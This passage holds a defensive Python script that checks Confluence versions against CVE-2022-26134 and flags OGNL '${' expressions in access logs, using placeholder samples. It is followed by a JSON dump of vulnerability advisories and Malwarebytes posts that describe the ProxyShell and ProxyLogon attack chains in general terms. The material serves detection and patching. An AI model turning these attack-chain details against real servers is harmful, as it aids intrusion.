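(7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1), the access-log
layout is the common Apache/Tomcat combined format, and all sample data
below is constructed for the example (no real payload is included).
"""
import re
from urllib.parse import unquote

# Affected ranges from the advisory: start inclusive, first fixed build exclusive.
AFFECTED_RANGES = [
    ((1, 3, 0), (7, 4, 17)),
    ((7, 13, 0), (7, 13, 7)),
    ((7, 14, 0), (7, 14, 3)),
    ((7, 15, 0), (7, 15, 2)),
    ((7, 16, 0), (7, 16, 4)),
    ((7, 17, 0), (7, 17, 4)),
    ((7, 18, 0), (7, 18, 1)),
]
LATEST_FIX = (7, 18, 1)


def parse_version(version):
    """'7.13.6' -> (7, 13, 6); tolerates suffixes such as '7.4.17-beta'."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    if len(parts) < 2:
        raise ValueError(f"unrecognised Confluence version: {version!r}")
    return tuple(parts + [0] * (3 - len(parts)))


def classify_version(version):
    """Return 'affected', 'fixed' or 'unsupported-assume-affected'.

    Versions inside a published range are affected. Versions at or above the
    fix on their own release line, or above the newest fix, are fixed. Any
    other older version (for example 7.12.5) sits on a line that never got a
    fix; the advisory says all versions are likely affected, so treat it so.
    """
    v = parse_version(version)
    if any(lo <= v < hi for lo, hi in AFFECTED_RANGES):
        return "affected"
    if v >= LATEST_FIX or any(v[:2] == hi[:2] and v >= hi for _, hi in AFFECTED_RANGES):
        return "fixed"
    return "unsupported-assume-affected"


# Combined access-log format: client, ident, user, [time], "METHOD URI PROTO", status, size.
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]+" (?P<status>\d{3}) \S+'
)


def fully_decode(uri, rounds=3):
    """Percent-decode until stable; scanners often double-encode the ${ marker."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def suspicious_requests(lines):
    """Flag requests whose decoded URI contains '${', the OGNL expression opener.

    This is the log-side equivalent of the WAF rule in the advisory. It is a
    triage filter, not proof of compromise: an HTTP 200 or 302 on such a
    request means the server processed it and deserves a closer look.
    """
    hits = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than guess
        uri = fully_decode(m.group("uri"))
        if "${" in uri:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "uri": uri, "status": int(m.group("status"))})
    return hits


# Constructed sample: a normal login, an encoded and a double-encoded "${...}"
# path (placeholder text, not an exploit), and a line that is not a request.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Jun/2022:10:01:02 +0000] "GET /login.action HTTP/1.1" 200 5123',
    '203.0.113.7 - - [03/Jun/2022:10:01:05 +0000] "GET /%24%7Bexpr%7D/ HTTP/1.1" 302 0',
    '198.51.100.9 - - [03/Jun/2022:10:01:09 +0000] "GET /pages/%2524%257Bexpr%257D HTTP/1.1" 200 812',
    "Jun  3 10:01:11 conf1 kernel: unrelated syslog noise",
]

if __name__ == "__main__":
    for ver in ("7.13.6", "7.13.7", "7.12.5", "7.18.1"):
        print(f"{ver}: {classify_version(ver)}")
    for hit in suspicious_requests(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['status']} {hit['uri']}")
```

The decode loop is the part that matters operationally: a rule that matches the literal `${` only on the raw request line misses the encoded form, and the classifier deliberately refuses to call an end-of-life build such as 7.12.x "fixed" just because it falls outside the published ranges.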
You can download the latest version from the [download centre](<https://www.atlassian.com/software/confluence/download-archives>).\n\nThe post [[updated]Unpatched Atlassian Confluence vulnerability is actively exploited](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-06-03T14:41:58", "type": "malwarebytes", "title": "[updated]Unpatched Atlassian Confluence vulnerability is actively exploited", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T14:41:58", "id": "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. 
A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. 
It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are 3 vulnerabilities that we commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. 
Attackers use them as follows:\n\n * **Get in** with CVE-2021-34473, a pre-authentication remote code execution (RCE) vulnerability: a path-confusion flaw in the Exchange front end lets an unauthenticated request reach back-end services it should never see.\n * **Take control** with CVE-2021-34523, an elevation of privilege (EoP) vulnerability in the Exchange PowerShell back end that lets the attacker act with the rights of a privileged user.\n * **Do bad things** with CVE-2021-31207, a security feature bypass that lets that now-privileged user write arbitrary files on the server, typically a web shell, which then runs code in the context of SYSTEM.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Updates from April 2021 (CVE-2021-34473 and CVE-2021-34523) and May 2021 (CVE-2021-31207) remediate all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014"This vulnerability is part of an attack chain. 
The initial attack requires the ability to make an untrusted connection to Exchange server port 443."\n\nWhile the CVE description is the same for the four CVEs, we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to authenticate as the Exchange server and steal mailbox content. CVE-2021-26857, an insecure deserialization flaw in the Unified Messaging service, was used to run code as SYSTEM. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014are post-authentication arbitrary file writes that allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool helps customers who do not have dedicated security or IT teams by applying interim mitigations and running a malware scan; it is not a substitute for installing the security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. 
CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. 
When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you notice or hear about a vulnerability that meets these "requirements", move it to the top of your "to-patch" list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": 
"https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:08:52", "description": "In affected versions of Confluence Server and Data Center, an OGNL\ninjection vulnerability exists that would allow an unauthenticated attacker\nto execute arbitrary code on a Confluence Server or Data Center instance.\nThe affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before\n7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0\nbefore 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "ubuntucve", "title": "CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T00:00:00", "id": "UB:CVE-2022-26134", "href": "https://ubuntu.com/security/CVE-2022-26134", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "atlassian": [{"lastseen": "2022-08-02T08:36:05", 
"description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\u00a0\r\nThe affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.\r\n\u00a0\r\nFor more information, see https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T20:08:07", "type": "atlassian", "title": "Remote code execution via OGNL injection in Confluence Server & Data Center - CVE-2022-26134", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-02T05:56:21", "id": "CONFSERVER-79016", "href": "https://jira.atlassian.com/browse/CONFSERVER-79016", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-11T03:27:03", "description": "This is a 
duplicate of https://jira.atlassian.com/browse/CONFSERVER-79016\r\n\r\nSee the link above for more information on the issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T03:36:35", "type": "atlassian", "title": "Unauthenticated remote code execution vulnerability via OGNL template injection - Duplicate", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-11T03:24:32", "id": "CONFSERVER-79000", "href": "https://jira.atlassian.com/browse/CONFSERVER-79000", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:44:44", "description": "*This vulnerability is being actively exploited in the wild. Affected servers should be patched immediately.*\r\n\r\nAn OGNL injection vulnerability exists that allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\r\nThe CVE ID is CVE-2021-26084.\r\nh4. 
Acknowledgements\r\n\r\nThe issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.\r\n\r\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\r\n\r\n*Affected versions:*\r\n * version < 6.13.23\r\n * 6.14.0 \u2264 version < 7.4.11\r\n * 7.5.0 \u2264 version < 7.11.6\r\n * 7.12.0 \u2264 version < 7.12.5\r\n\r\n*Fixed versions:*\r\n * 6.13.23\r\n * 7.4.11\r\n * 7.11.6\r\n * 7.12.5\r\n * 7.13.0 \u00a0\r\n\r\n\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-27T05:13:48", "type": "atlassian", "title": "Confluence Server Webwork OGNL injection - CVE-2021-26084", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-22T01:29:22", "id": "ATLASSIAN:CONFSERVER-67940", "href": "https://jira.atlassian.com/browse/CONFSERVER-67940", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-30T10:41:45", "description": "A user with a valid account on a Confluence Server or Data Center instance is 
able to execute arbitrary Java code or run arbitrary system commands by injecting an OGNL payload.\r\n\r\n\u00a0\r\n\r\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\r\n\r\n*Affected versions:*\r\n\r\n\u00a0* version < 6.13.23\r\n\u00a0* 6.14.0 \u2264 version < 7.4.11\r\n\u00a0* 7.5.0 \u2264 version < 7.11.6\r\n\u00a0* 7.12.0 \u2264 version < 7.12.5\r\n\r\n*Fixed versions:*\r\n\r\n\u00a0* 6.13.23\r\n\u00a0* 7.4.11\r\n\u00a0* 7.11.6\r\n\u00a0* 7.12.5\r\n\u00a0* 7.13.0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-27T03:55:57", "type": "atlassian", "title": "RCE on Confluence Data Center via OGNL Injection - CVE-2021-39114", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-39114"], "modified": "2022-06-01T02:34:36", "id": "CONFSERVER-68844", "href": "https://jira.atlassian.com/browse/CONFSERVER-68844", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-30T10:41:50", "description": "*This vulnerability is being actively 
exploited in the wild. Affected servers should be patched immediately.*\r\n\r\nAn OGNL injection vulnerability exists that allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\r\nThe CVE ID is CVE-2021-26084.\r\nh4. Acknowledgements\r\n\r\nThe issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.\r\n\r\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\r\n\r\n*Affected versions:*\r\n * version < 6.13.23\r\n * 6.14.0 \u2264 version < 7.4.11\r\n * 7.5.0 \u2264 version < 7.11.6\r\n * 7.12.0 \u2264 version < 7.12.5\r\n\r\n*Fixed versions:*\r\n * 6.13.23\r\n * 7.4.11\r\n * 7.11.6\r\n * 7.12.5\r\n * 7.13.0 \u00a0\r\n\r\n\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-27T05:13:48", "type": "atlassian", "title": "Confluence Server Webwork OGNL injection - CVE-2021-26084", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-39114"], "modified": "2022-06-15T04:33:32", 
"id": "CONFSERVER-67940", "href": "https://jira.atlassian.com/browse/CONFSERVER-67940", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-06-14T17:56:54", "description": "A remote code execution vulnerability exists in Atlassian Confluence. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2022-26134)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T00:00:00", "id": "CPAI-2022-0297", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:29:45", "description": "A remote code execution vulnerability exists in Atlassian Confluence. 
